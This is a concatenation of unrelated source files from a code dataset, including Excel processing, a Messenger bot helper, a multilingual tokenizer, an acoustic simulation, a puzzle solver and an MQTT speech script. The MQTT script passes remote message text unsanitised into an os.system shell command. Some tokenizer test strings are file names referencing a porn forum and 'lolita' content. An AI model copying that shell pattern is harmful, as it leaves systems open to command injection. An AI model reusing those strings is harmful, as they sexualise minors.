value\r\n\r\nclass VProcess(Process):\r\n def __init__(self, name, queue, path):\r\n Process.__init__(self, name=name)\r\n self._queue = queue\r\n self._path = path\r\n\r\nclass QueueWriteProcess(VProcess):\r\n def _preprocess_date(self, ctype, value):\r\n # ctype: 0 empty, 1 string, 2 number, 3 date, 4 boolean, 5 error\r\n val = value\r\n if ctype == 0:\r\n pass\r\n elif ctype == 1:\r\n val = val.replace('\\.','\\-')\r\n elif ctype == 2:\r\n pass\r\n elif ctype == 3:\r\n val = xlrd.xldate.xldate_as_datetime(val, 0)\r\n val = val.strftime(\"%Y-%m-%d\")\r\n elif ctype == 4:\r\n pass\r\n else:\r\n pass\r\n \r\n return val\r\n \r\n def run(self):\r\n print('[->| ] PID [%s]: %s is running...' % (os.getpid(), self.name))\r\n titleIncluded = 1\r\n \r\n filelist = os.listdir(self._path)\r\n# filelist = [f for f in os.listdir(os.path.join('..', 'data', 'insurance', 'raw')) if f.endswith(\".xls\") or f.endswith(\".xlst\")]\r\n for file in filelist:\r\n workbook = xlrd.open_workbook(os.path.join(self._path, file))\r\n print('[->| ] Workbook [%s] Begin' % (file))\r\n sheets = workbook.sheets()\r\n for sheet in sheets:\r\n nrows = sheet.nrows\r\n print('[->| ] Sheet [%s].[%s], Rows [%d] Begin' % (file, sheet.name, (nrows + 1 - titleIncluded)))\r\n # insurance_type, insurance_name, order_date, insurance_premium, insurance_commission, staff_no\r\n offsets = [1, 2, 7, 14, 15, 18]\r\n for row in xrange(nrows):\r\n if row < titleIncluded:\r\n continue\r\n \r\n obj = DataObject()\r\n obj.insurance_type = sheet.cell_value(row, offsets[0])\r\n obj.insurance_name = sheet.cell_value(row, offsets[1])\r\n obj.order_date = self._preprocess_date(sheet.cell(row, offsets[2]).ctype, sheet.cell_value(row, offsets[2]))\r\n obj.insurance_premium = sheet.cell_value(row, offsets[3])\r\n obj.insurance_commission = sheet.cell_value(row, offsets[4])\r\n obj.staff_no = sheet.cell_value(row, offsets[5])\r\n# print(obj)\r\n self._queue.put(obj)\r\n time.sleep(random.random() / 10)\r\n print('[->| ] Sheet [%s].[%s], Rows [%d] End' % (file, sheet.name, (nrows + 1 - titleIncluded)))\r\n print('[->| ] Workbook [%s] End' % (file))\r\n\r\nclass QueueReadProcess(VProcess):\r\n def run(self):\r\n time.sleep(2)\r\n dst_name = '车享家保单.xls'\r\n print('[ |->] PID [%s]: %s is running...' % (os.getpid(), self.name))\r\n \r\n workbook = xlwt.Workbook(encoding='utf-8')\r\n sheet = workbook.add_sheet('sheet1', cell_overwrite_ok=True)\r\n header, shape = self._init_header()\r\n row_cnt = 0\r\n \r\n for row in xrange(shape[0]):\r\n for col in xrange(shape[1]):\r\n sheet.write(row_cnt, col, label=header[row][col])\r\n row_cnt += 1\r\n \r\n while not self._queue.empty():\r\n obj = self._queue.get(True)\r\n# print('Get from queue [%s, %s, %s, %s]' % (obj.insurance_name, obj.insurance_type, obj.insurance_premium, obj.insurance_commission))\r\n \r\n sheet.write(row_cnt, 0, label=obj.order_date)\r\n sheet.write(row_cnt, 1, label=obj.insurance_name)\r\n sheet.write(row_cnt, 2, label=obj.insurance_type)\r\n sheet.write(row_cnt, 3, label=obj.insurance_premium)\r\n sheet.write(row_cnt, 4, label=obj.insurance_commission)\r\n sheet.write(row_cnt, 5, label=obj.staff_no)\r\n \r\n print('[ |->] Task Done [%d], Task Queued [%d]' % ((row_cnt + 1 - shape[0]), self._queue.qsize()))\r\n row_cnt += 1\r\n time.sleep(random.random() / 5)\r\n \r\n print('[ |->] Saving excel file [%s] to disk ...' % os.path.join(self._path, dst_name))\r\n workbook.save(os.path.join(self._path, dst_name))\r\n print('[ |->] Excel file [%s] saved' % os.path.join(self._path, dst_name))\r\n\r\n def _init_header(self):\r\n headers = [['col1', 'col2', 'col3', 'col4', 'col5', 'col6'],\r\n ['varchar2', 'varchar2', 'varchar2', 'varchar2', 'varchar2', 'varchar2'],\r\n ['2018-06-05', 'demo', '商业', 'demo', 'demo', 'demo'],\r\n ['签单日期', '保险公司名称', '险种', '含税保费', '手续费金额', '员工工号']\r\n ]\r\n return headers, (len(headers), len(headers[0]))\r\n\r\nclass BatchProcessManager(object):\r\n def __init__(self, from_path, to_path):\r\n self._queue = Queue()\r\n self._writer = QueueWriteProcess('Writer', self._queue, from_path)\r\n self._reader = QueueReadProcess('Reader', self._queue, to_path)\r\n \r\n def run(self):\r\n self._writer.start()\r\n self._reader.start()\r\n \r\n self._writer.join()\r\n self._reader.join()\r\n\r\n \r\nif __name__=='__main__':\r\n parser = argparse.ArgumentParser(description='Insurance Data Process Helper:')\r\n parser.add_argument('--src', type=str, default=os.path.join('.', 'src'), dest='src', help='source file path')\r\n parser.add_argument('--dst', type=str, default=os.path.join('.', 'dst'), dest='dst', help='target file path')\r\n args = parser.parse_args()\r\n \r\n# os.makedirs(args.dst)\r\n \r\n manager = BatchProcessManager(args.src, args.dst)\r\n manager.run()","sub_path":"src/insurance_data_converse.py","file_name":"insurance_data_converse.py","file_ext":"py","file_size_in_byte":7053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"243915738","text":"import json, re, pprint, requests\nfrom Groofy.settings import fb_settings\n\nPAGE_ACCESS_TOKEN = fb_settings['PAGE_ACCESS_TOKEN']\nVERIFY_TOKEN = fb_settings['VERIFY_TOKEN']\n\ndef reply(fbid, msg):\n post_message_url = 'https://graph.facebook.com/v2.6/me/messages?access_token=%s'%PAGE_ACCESS_TOKEN\n response_msg = json.dumps({\"recipient\":{\"id\":fbid}, \"message\":msg})\n status = requests.post(post_message_url, headers={\"Content-Type\": \"application/json\"},data=response_msg)\n print('='*40 + 'REPLY STARTS' + '='*40); pprint.pprint(msg); print('='*40 + 'REPLY ENDS ' + '='*40)\n pprint.pprint(status.json()); print('RESPONSE FROM FACEBOOK ENDS' + '='*65)\n return status\n","sub_path":"Groofy/utils/reply.py","file_name":"reply.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"231898648","text":"# Copyright 2008-2013 the original author or authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport random\nimport re\n\nfrom pubbot.conversation import chat_receiver\nfrom pubbot.education.models import Education\nfrom pubbot.ratelimit import enforce_rate_limit\n\n\n@chat_receiver(r\"^(?P.*)$\")\ndef lookup_education_response(sender, user, sentence, **kwargs):\n replies = []\n\n for module in Education.objects.all():\n if module.regex:\n regex = module.trigger\n else:\n regex = r'\\b%s\\b' % re.escape(module.trigger)\n\n result = re.search(regex, sentence.lower())\n if result:\n replies.append((module, result.groupdict()))\n\n if len(replies) == 0:\n return\n\n return choose_education_response(user=user, responses=replies)\n\n\n@enforce_rate_limit(\"1/15s\", limit_by=['user'])\n@enforce_rate_limit(\"10/10m\")\ndef choose_education_response(user, responses, **kwargs):\n response, args = random.choice(responses)\n\n if random.random() >= response.probability:\n return\n\n # Build a reply using common fields and values matched in regex\n metadata = {'nick': user}\n metadata.update(kwargs)\n metadata.update(args)\n\n reply = response.response % metadata\n\n return {\n 'content': reply,\n }\n","sub_path":"pubbot/education/receivers.py","file_name":"receivers.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"52556303","text":"#!/usr/bin/env python3.6\n# -*- coding: utf-8 -*-\nimport re\nimport itertools\nimport opencc\nimport jieba\n# from pyhanlp import *\nimport MeCab\nimport os\n\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\njieba.load_userdict(os.path.join(basedir, '../data/dict/words.txt'))\n\n# chinese\nchinese_ranges = [\n ('\\u2E80', '\\u2EFF'),\n ('\\u2F00', '\\u2FDF'),\n ('\\u3400', '\\u4DBF'),\n ('\\u4e00', '\\u62FF'),\n ('\\u6300', '\\u77FF'),\n ('\\u7800', '\\u8CFF'),\n ('\\u8D00', '\\u9FCC'),\n\n ('\\U00020000', '\\U000215FF'),\n ('\\U00021600', '\\U000230FF'),\n ('\\U00023100', '\\U000245FF'),\n ('\\U00024600', '\\U000260FF'),\n ('\\U00026100', '\\U000275FF'),\n ('\\U00027600', '\\U000290FF'),\n ('\\U00029100', '\\U0002A6DF'),\n ('\\U0002A700', '\\U0002B734'),\n ('\\U0002B740', '\\U0002B81D'),\n ('\\U0002B820', '\\U0002CEAF'),\n ('\\U0002CEB0', '\\U0002EBEF'),\n ('\\U0002F800', '\\U0002FA1F')\n ]\n\n# japanese\n# https://www.key-shortcut.com/en/writing-systems/%E3%81%B2%E3%82%89%E3%81%8C%E3%81%AA-japanese\nhiragana = [('\\u3040', '\\u309F')]\nkatakana = [('\\u30A0', '\\u30FF')]\nkatakana_phonetic = [('\\u31F0', '\\u31FF')]\nkanbun = [('\\u3190', '\\u319F')]\nhalf_width = [('\\uFF65', '\\uFF9F')]\n\n# korean\n# https://www.key-shortcut.com/en/writing-systems/%ED%95%9C%EA%B5%AD-korean-script/hangul-characters-1\nkorean_ranges = [\n ('\\u1100', '\\u11FF'), # Hangul Jamo\n ('\\u3130', '\\u318F'), # Hangul Compatibility Jamo\n ('\\uA960', '\\uA97F'), # Hangul Jamo Extended-A\n]\n\ncyrillic_ranges = [\n ('\\u0400', '\\u04FF'),\n ('\\u0500', '\\u052F'),\n ('\\u2DE0', '\\u2DFF'),\n ('\\uA640', '\\uA69F')\n]\n\ndef make_pattern(ranges):\n return r'([%s]+)' % (''.join(['%s-%s' % (f, s) for f, s in ranges]))\n\n\nchinese_pattern = make_pattern(chinese_ranges)\n\njapanese_pattern = make_pattern(list(itertools.chain(\n hiragana, katakana, katakana_phonetic, kanbun, half_width, chinese_ranges)))\nenglish_pattern = r'((?:[a-zA-Z]+[,.\\-: ()&])?[a-zA-Z0-9]+)'\n\nkorean_pattern = make_pattern(korean_ranges)\n\ncyrillic_word = r'(?:[%s]+)' % (''.join(['%s-%s' % (f, s) for f, s in cyrillic_ranges]))\ncyrillic_pattern = r'(%s(?:[ \\-.]%s)+)' % (cyrillic_word, cyrillic_word)\n\n\ntradition2simple = opencc.OpenCC('t2s')\n\nwakati = MeCab.Tagger(\"-Owakati\")\n\n\ndef preprocess(lang: str, phrases):\n if lang == 'chinese':\n return [' '.join([term for term in jieba.cut(tradition2simple.convert(p))]) for p in phrases]\n elif lang == 'japanese':\n return [wakati.parse(p).split() for p in phrases]\n elif lang == 'english':\n return [re.sub(r'[,.\\-:()]', ' ', phrase).lower() for phrase in phrases]\n # elif lang == 'korean':\n else:\n return phrases\n\n\ndef extract(text: str):\n chinese_phrases = re.findall(chinese_pattern, text, re.UNICODE)\n japanese_phrases = [p for p in re.findall(japanese_pattern, text, re.UNICODE) if p not in chinese_phrases]\n\n chinese_phrases = [tradition2simple.convert(p) for p in chinese_phrases]\n english_phrases = re.findall(english_pattern, text, re.UNICODE)\n korean_phrases = re.findall(korean_pattern, text, re.UNICODE)\n cyrillic_phrases = re.findall(cyrillic_pattern, text, re.UNICODE)\n\n return {\n 'chinese': preprocess('chinese', chinese_phrases),\n 'japanese': preprocess('japanese', japanese_phrases),\n 'english': preprocess('english', english_phrases),\n 'korean': preprocess('korean', korean_phrases),\n 'cyrillic': preprocess('cyrillic', cyrillic_phrases)\n }\n\n\nword_pattern = make_pattern(list(itertools.chain(\n hiragana, katakana, katakana_phonetic, kanbun, half_width, chinese_ranges,\n korean_ranges, cyrillic_ranges, [('a', 'z'), ('A', 'Z')])))\n\n\ndef contain(ranges, c):\n for start, end in ranges:\n if start <= c <= end:\n return True\n return False\n\n\ndef tokenize(text: str):\n def _tokenize(text: str):\n start = 0\n while start < len(text):\n end = start\n lang = 'unknown'\n\n if '0' <= text[end] <= '9':\n while end < len(text) and '0' <= text[end] <= '9':\n end += 1\n lang = 'number'\n elif 'a' <= text[end].lower() <= 'z':\n # ENGLISH\n while end < len(text) and 'a' <= text[end].lower() <= 'z':\n end += 1\n lang = 'english'\n\n elif contain(list(itertools.chain(\n hiragana, katakana, katakana_phonetic, kanbun, half_width, chinese_ranges)), text[end]):\n # CJK\n while end < len(text) and contain(list(itertools.chain(\n hiragana, katakana, katakana_phonetic, kanbun, half_width, chinese_ranges)), text[end]):\n end += 1\n lang = 'cjk'\n\n if lang == 'cjk':\n for c in text[start:end]:\n if not contain(chinese_ranges, c):\n lang = 'japanese'\n break\n else:\n lang = 'chinese'\n elif contain(korean_ranges, text[end]):\n # KOREAN\n while end < len(text) and contain(korean_ranges, text[end]):\n end += 1\n lang = 'korean'\n elif contain(cyrillic_ranges, text[end]):\n # cyrillic\n while end < len(text) and contain(cyrillic_ranges, text[end]):\n end += 1\n lang = 'cyrillic'\n\n if end > start:\n yield lang, text[start:end]\n start = end\n else:\n yield lang, text[start:start+1]\n start += 1\n\n words = []\n for lang, word in _tokenize(text):\n if lang == 'chinese':\n words.extend(jieba.cut(tradition2simple.convert(word)))\n elif lang == 'japanese':\n words.extend([tradition2simple.convert(w) for w in wakati.parse(word).split()])\n elif lang == 'english':\n hump_pattern = r'([A-Z][a-z]+){2,}'\n if re.fullmatch(hump_pattern, word):\n words.extend([sub.lower() for sub in re.findall(r'[A-Z][a-z]+', word)])\n else:\n words.append(word.lower())\n else:\n words.append(word)\n\n return [w for w in words if w not in '._-+&@()[]()【】「」=、/\\\\, \\t\\'\\\"#!~`::']\n\nif __name__ == '__main__':\n print(extract('南河茜(仲村みう,なかむらみう),日本女演员,2017年出道。'))\n print(extract('南河茜(仲村みう,なかむらみう),日本女演员,2017年出道。'))\n print(extract('Anri Sugihara 杉原杏璃 - 東京アンリ Blu-ray'))\n print(extract('60 минут по горячим следам (дневной выпуск в 12_50) от 01.07.19.mp4'))\n\n print(tokenize('[Heavy Blues] Lonely Kamel 2008-2014 (Jamal The Moroccan)'))\n print(tokenize('Luther Wright & The Wrongs - Rebuild The Wall - 2001'))\n print(tokenize('한국 & 외국 영화 엑기스 모음 3 Edited By HHan'))\n print(tokenize('Antman.And.The.Wasp.2018.TRUEFRENCH.HDRiP.MD.XViD-STVFRV.avi'))\n print(tokenize('みまさか(iuu05.com)欧美萝莉-西洋萝莉 lolita -ロリ'))\n print(tokenize('[190619]逢田梨香子 1st EP「Principal」(CD+DVD初回限定盤)[320K].rar'))\n print(tokenize('ymdha@草榴社區@MOKO美空徐莹私拍套图'))\n print(tokenize('请所有支持热爱色中色的会员互相转帖告知!让世人知道真相。916事件'))\n\n print(tokenize('六月最爱'))","sub_path":"parser/lang.py","file_name":"lang.py","file_ext":"py","file_size_in_byte":7624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"507814877","text":"import numpy as np\nimport json\nfrom dataclasses import dataclass\nimport matplotlib.pyplot as plt\n\n# @dataclass\n# class diffusorParameters:\n\n@dataclass\nclass SimulationProperties:\n distanceBetweenSoundSourceAndProbe: float # r0\n distanceBetweenMicrophonesAndProbe: float # r\n\n@dataclass\nclass DiffusorProperties:\n algorithm: staticmethod\n modulo: int\n soundSpeed: float\n frequencyStart: float\n numberOfElements: int\n elementWidth: float\n angle: float\n samplesPerElement: int\n\n def createDiffusorSequence(self) -> list:\n return [((self.algorithm(x)) % self.modulo)\n * self.soundSpeed / self.frequencyStart / 2 / self.modulo\n for x in range(1, self.numberOfElements + 1)]\n\n def getMinimumWaveLength(self):\n return self.elementWidth / 2\n\n def calucalteK(self, frequency):\n return 2 * np.pi * frequency / self.soundSpeed\n\n\nclass Diffusor:\n def __init__(self, diffusorProperties: DiffusorProperties, diffusorAngleSequence: list):\n self.sequence = diffusorProperties.createDiffusorSequence()\n self.diffusorProperties = diffusorProperties\n self.diffusorAngleSequence = diffusorAngleSequence\n\n assert len(sequence) == len(diffusorAngleSequence)\n\n self.renderDiffusorFunction()\n\n def createRamp(self, width: float, baseLevel: float, side: str, n: int):\n const = np.tan(self.diffusorProperties.angle)\n tempY = list()\n for index in range(n):\n tempX = index * width / n\n tempY.append(const * tempX)\n tempY = np.array(tempY) if side == 'L' else np.flip(np.array(tempY))\n return baseLevel + tempY\n\n def renderDiffusorFunction(self):\n self.y = np.array([])\n for index, level in enumerate(self.sequence):\n self.y = np.append(self.y, self.createRamp(\n self.diffusorProperties.elementWidth,\n level,\n self.diffusorAngleSequence[index],\n self.diffusorProperties.samplesPerElement))\n\n self.x = (np.arange(len(self.y)) / len(self.y) - 0.5) * \\\n self.diffusorProperties.elementWidth * self.diffusorProperties.numberOfElements\n print(\"Diffusor function was rendered!\")\n\ndef angles():\n return np.arange(0, np.pi, np.pi/180)\n\ndef R(k, currentHeight):\n return np.exp(-1j * k * 2 * currentHeight)\n\n\ndef alpha(k, r, r0):\n return -1j * k / (8 * np.pi ** 2) * np.exp(-1j * k * (r + r0))\n\n\ndef beta(k, b, r, phi):\n return np.sinc(k * b / r) * (np.cos(phi + 1))\n\ndef calculateIntegral(x: np.array, values: list) -> float:\n sum = 0\n for xIndex in range(1, len(x)):\n currentXHeight = abs(x[xIndex] - x[xIndex-1])\n tempSurface = 1 / 2 * (values[xIndex] + values[xIndex-1]) * currentXHeight\n sum += tempSurface\n return sum\n\n\ndef gamma(k, x: np.array, phi, y: np.array):\n values = list()\n for index, singleX in enumerate(x):\n temp = R(k, y[index]) * np.exp(1j * k * singleX * np.sin(phi))\n values.append(temp)\n return calculateIntegral(x, values)\n\n\nif __name__ == \"__main__\":\n diffusorProperties = DiffusorProperties(\n algorithm=lambda x: x**5,\n modulo=23,\n soundSpeed=343.6,\n frequencyStart=500,\n numberOfElements=46,\n elementWidth=0.021739,\n angle=np.pi/6,\n samplesPerElement=30)\n\n simulationProperties = SimulationProperties(10, 5)\n\n sequence = diffusorProperties.createDiffusorSequence()\n\n diffusorAngleSequence = ['L', 'R', 'L', 'R', 'R', 'R', 'R', 'R',\n 'L', 'L', 'R', 'L', 'R', 'L', 'R', 'R',\n 'R', 'L', 'R', 'L', 'R', 'L', 'R', 'L',\n 'R', 'L', 'L', 'L', 'R', 'L', 'L', 'R',\n 'R', 'L', 'L', 'L', 'R', 'R', 'R', 'L',\n 'R', 'L', 'L', 'R', 'L', 'L']\n\n diffusor = Diffusor(diffusorProperties, diffusorAngleSequence)\n\n frequencies = [100, 125, 160, 200, 250,\n 315, 400, 500, 630, 800,\n 1000, 1250, 1600, 2000, 2500]\n\n results = dict() \n for freq in frequencies:\n print(f\"calculating frequency {freq} Hz\")\n k = diffusorProperties.calucalteK(freq)\n firstPart = alpha(k, simulationProperties.distanceBetweenSoundSourceAndProbe,\n simulationProperties.distanceBetweenSoundSourceAndProbe)\n\n sizeOfDiffusor = max(diffusor.x)\n \n phases = dict()\n for phase in np.arange(0, np.pi, np.pi/180):\n second = beta(k, sizeOfDiffusor, simulationProperties.distanceBetweenMicrophonesAndProbe, phase)\n third = gamma(k, diffusor.x, phase, diffusor.y) \n phases[phase] = np.real(np.abs(firstPart * second * third))\n\n results[freq] = phases\n \n endResult = {\"values\": list(), \"frequencies\": list(), \"parameterName\" : \"Acoustic Diffusion Coefficient\"}\n for freq in results.keys():\n tempResult = list(results[freq].values())\n print(tempResult)\n first = np.square(np.sum(tempResult))\n second = np.sum(np.square(tempResult))\n third = (len(tempResult) - 1) * second\n endResult[\"frequencies\"].append(freq)\n endResult[\"values\"].append((first - second) / third)\n\n print(json.dumps(endResult, indent=3))\n \n plt.plot(endResult[\"frequencies\"], endResult[\"values\"])\n plt.show()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"14680447","text":"#!/bin/env python3\n\nwith open(\"input\") as f:\n text = f.read()\n\ntiles_s = text.split(\"\\n\\n\")\n\n\ndef fliph(tile):\n return [\"\".join(reversed(x)) for x in tile]\n\ndef transpose(tile):\n return [\"\".join(x) for x in zip(*tile)]\n\ndef rotations(tile):\n rot = [tile]\n for _ in range(3):\n rot.append(fliph(transpose(rot[-1])))\n return rot\n\ndef perm(tile):\n return rotations(tile) + rotations(fliph(tile))\n\n\ntiles = {}\nfor ts in tiles_s:\n n, *tile = ts.strip().split(\"\\n\")\n n = int(n[5:-1])\n tiles[n] = perm(tile)\n\n\nsidelen = int(len(tiles) ** 0.5)\nsolution = [[0] * sidelen for _ in range(sidelen)]\n\nstack = list(reversed([(row, col) for col in range(sidelen) for row in range(sidelen)]))\n\ndef solve():\n if len(stack) == 0:\n return True\n row, col = stack.pop()\n tids = list(tiles.keys())\n for tid in tids:\n perm = tiles[tid]\n del tiles[tid]\n for p in perm:\n if row > 0:\n if not solution[row-1][col][1][-1] == p[0]:\n continue\n if col > 0:\n if not [x[-1] for x in solution[row][col-1][1]] == [x[0] for x in p]:\n continue\n solution[row][col] = (tid, p)\n if solve():\n return True\n tiles[tid] = perm\n stack.append((row, col))\n\nsolve()\n\nprint(solution[0][0][0] * solution[0][-1][0] * solution[-1][0][0] * solution[-1][-1][0])\n\ndef no_border(tile):\n return [row[1:-1] for row in tile[1:-1]]\n\nn_b_tiles = []\nfor tr in solution:\n a = []\n for i, tile in tr:\n a.append(no_border(tile))\n n_b_tiles.append(a)\n\n\nsidelength = len(n_b_tiles) * len(n_b_tiles[0][0])\ntile_sl = len(n_b_tiles[0][0])\nimage = [[0 for _ in range(sidelength)] for x in range(sidelength)]\n\nfor nrow, trow in enumerate(n_b_tiles):\n for ncol, tile in enumerate(trow):\n for ty, row in enumerate(tile):\n for tx, char in enumerate(row):\n y = (tile_sl*nrow)+ty\n x = (tile_sl*ncol)+tx\n image[y][x] = char\n\nfor row in image:\n print(\"\".join(row))\n\nmonster = [\n\" # \",\n\"# ## ## ###\",\n\" # # # # # # \",\n]\n\nmatches = 0\n\nfor p in perm(image):\n #if matches > 0:\n # break\n for y_base in range(len(image)-len(monster)):\n for x_base in range(len(image[0])-len(monster[0])):\n match = True\n for y in range(len(monster)):\n for x in range(len(monster[0])):\n if monster[y][x] == \"#\" and image[y_base+y][x_base+x] != \"#\":\n match = False\n break\n if not match:\n break\n if match:\n matches += 1\n\nn_sharp = sum([\"\".join(row).count(\"#\") for row in image])\nn_monster = sum([row.count(\"#\") for row in monster])\nprint(n_sharp-n_monster * matches)\n","sub_path":"day20/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"612242771","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/env python \n#coding=utf-8\nimport time\nimport json\nimport os\nimport speech_recognition as sr\nfrom espeak import espeak\nfrom lib import qiot\n\n\"\"\"\n requirement:\n -- pip install paho-mqtt\n run command: python mqtt.py\n\"\"\"\n\n\"\"\"\n Setup connection options\n\"\"\"\nconnection = None\nconnection = qiot.connection(qiot.protocol.MQTT)\nconnection_options = connection.read_resource('./res/resourceinfo.json', '/ssl/')\n\n\"\"\"\n Send data to QIoT Suite Lite.\n\"\"\"\n\nr = sr.Recognizer()\nsr.operation_timeout = 5\n#sr.dynamic_energy_threshold = True\n\ndef speak_text(text):\n\tcommand_speak = 'espeak -s 200 -v en+f3 \\\"' + text +'\\\"'\n\tos.system(command_speak)\n\ndef speech(audio_in):\n try:\n text = r.recognize_google(\n audio_in, key=None, language=\"en-US\", show_all=False)\n print(\"Google Speech Recognition thinks you said \" + text)\n connection.publish_by_id(\"echotext\", text)\n except sr.UnknownValueError:\n print(\"Google Speech Recognition could not understand audio\")\n except sr.RequestError as e:\n print(\"Could not request results from Google Speech Recognition service; {0}\".format(e))\n\ndef on_message(event_trigger, data):\n message = json.loads(data[\"message\"].payload)\n if(data['id'] == 'action'):\n print( \"action : \" + str(message['value']))\n print( \"------------------------\")\n if(message['value'] == 1):\n with sr.Microphone() as source:\n print(\"Say something!\")\n audio = r.listen(source)\n speech(audio)\n if(data['id'] == 'playMusic'):\n print( \"playMusic : \" + str(message['value']))\n print( \"------------------------\")\n if(message['value']['command'] == \"play\"):\n play_music('/Multimedia/test2.mp3')\n if(message['value']['command'] == \"stop\"):\n stop_music()\n if(data['id'] == 'speak'):\n print(\"speak : \" + message['value'])\n print( \"------------------------\")\n speak_text(message['value'].encode('utf8'))\n\ndef on_connect(event_trigger, data):\n print(\"client ready\")\n connection.subscribe_by_id(\"action\")\n connection.subscribe_by_id(\"echotext\")\n connection.subscribe_by_id(\"speak\")\n\nconnection.on(\"connect\", on_connect)\nconnection.on(\"message\", on_message)\nconnection.connect(connection_options)\n\nwhile 1:\n pass\n time.sleep(0.1)","sub_path":"speak/mqtt.py","file_name":"mqtt.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"618624808","text":"import cairosvg\nimport svgwrite as svg\nimport sys\n\ndef split(line):\n\tL1=line.replace(';','|')\n\tL2=L1.split('|')\n\tL3=[L.split(',') for L in L2]\n\treturn L3,['#FFFFFF' for i in L3]\n\n\ndef drawStack(ofnamePrefix,stack,cols,prms):\n\tif len(stack)==0:\n\t\treturn\n\tofname='{}-{}.svg'.format(ofnamePrefix,prms['ofsuffix'])\n\tdwg=svg.Drawing(ofname)\n\tw,h=prms['w'],prms['h']\n\tf=prms['fs']\n\tgx,gy=prms['gx'],prms['gy']\n\tl,L=prms['lw_block'],prms['lw_stack']\n\tD=prms['dir']\n\tN=sum([len(G) for G in stack])\n\n\tS='stroke-width:{};stroke:#000000;'.format(L)\n\tif D=='H':\n\t\tW,H=(gx+w)*N+gx,h+2*gy\n\t\tdwg.add(svg.shapes.Line(start=(-L/2,0),end=(W,0),style=S))\n\t\tdwg.add(svg.shapes.Line(start=(-L/2,H),end=(W,H),style=S))\n\t\tdwg.add(svg.shapes.Line(start=(0,0),end=(0,H),style=S))\n\telse:\n\t\tW,H=w+2*gx,(gy+h)*N+gy\n\t\tdwg.add(svg.shapes.Line(start=(0,0),end=(0,H+L/2),style=S))\n\t\tdwg.add(svg.shapes.Line(start=(W,0),end=(W,H+L/2),style=S))\n\t\tdwg.add(svg.shapes.Line(start=(0,H),end=(W,H),style=S))\n\t\n\ts='stroke-width:{};stroke:#000000;'.format(l)\n\tts='text-anchor:middle;alignment-baseline:middle;font-size:{}pt;font-family:monospace;'.format(f)\n\tn=1\n\tfor ig in range(len(stack)):\n\t\tcol=cols[ig]\n\t\tG=stack[ig]\n\t\tfor v in G:\n\t\t\tif D=='H':\n\t\t\t\tx,y=(n-1)*(gx+w)+gx,gy\n\t\t\telse:\n\t\t\t\tx,y=gx,H-n*(gy+h)\n\t\t\tdwg.add(svg.shapes.Rect(insert=(x,y),size=(w,h),fill=col,style=s))\n\t\t\tdwg.add(svg.text.Text(text=v,insert=(x+w/2,y+h/2),style=ts))\n\t\t\tn+=1\n\tdwg.save()\n\tcairosvg.svg2png(url=ofname,write_to=ofname[:-4]+'.png',parent_width=W,parent_height=H)\n\ncolors={'w':'#FFFFFF',\n\t\t'r':'#FFCFCF',\n\t\t'y':'#FFFFCF',\n\t\t'g':'#CFFFCF',\n\t\t'c':'#CFFFFF',\n\t\t'b':'#CFCFFF',\n\t\t'm':'#FFCFFF',\n\t\t'o':'#FFCF7F',\n\t\t'k':'#CFCFCF'\n\t\t}\nif __name__=='__main__':\n\tif len(sys.argv)<2:\n\t\tprint('Usage:')\n\t\tprint(' sys.argv[0] [inputFileName]')\n\t\tsys.exit()\n\tifname=sys.argv[1]\n\tofindex=0\n\tstack=[]\n\tcols=[]\n\tcnt=0\n\tprmsDef={'w':50,'h':30,'fs':16,'gx':6,'gy':4,'lw_block':1,'lw_stack':2,'ofsuffix':'','dir':'V'}\n\tprms=prmsDef.copy()\n\twith open(ifname,'r') as fptr:\n\t\tfor line in fptr:\n\t\t\tif len(line)>=2:\n\t\t\t\tif line[0]=='[':\n\t\t\t\t\tif prms['ofsuffix']=='':\n\t\t\t\t\t\tprms['ofsuffix']='{}'.format(ofindex)\n\t\t\t\t\tdrawStack(ifname,stack,cols,prms)\n\t\t\t\t\tstack,cols=split(line[1:-1])\n\t\t\t\t\tcnt=0\n\t\t\t\t\tofindex+=1\n\t\t\t\t\tprms['ofsuffix']=''\n\t\t\t\telif line[0]=='E':\n\t\t\t\t\tbreak\n\t\t\t\telif line[0]=='%':\n\t\t\t\t\tcontinue\n\t\t\t\telif line[0]=='P':\n\t\t\t\t\tif cnt0 else prmsDef['w']\n\t\t\t\telif line[0]=='H':\n\t\t\t\t\targint=int(line[1:-1])\n\t\t\t\t\tprms['h']=argint if argint>0 else prmsDef['h']\n\t\t\t\telif line[0]=='X':\n\t\t\t\t\targint=int(line[1:-1])\n\t\t\t\t\tprms['gx']=argint if argint>0 else prmsDef['gx']\n\t\t\t\telif line[0]=='Y':\n\t\t\t\t\targint=int(line[1:-1])\n\t\t\t\t\tprms['gy']=argint if argint>0 else prmsDef['gy']\n\t\t\t\telif line[0]=='F':\n\t\t\t\t\targint=int(line[1:-1])\n\t\t\t\t\tprms['fs']=argint if argint>0 else prmsDef['fs']\n\t\t\t\telif line[0]=='L':\n\t\t\t\t\targint=int(line[1:-1])\n\t\t\t\t\tprms['lw_stack']=argint if argint>0 else prmsDef['lw_stack']\n\t\t\t\telif line[0]=='l':\n\t\t\t\t\targint=int(line[1:-1])\n\t\t\t\t\tprms['lw_block']=argint if argint>0 else 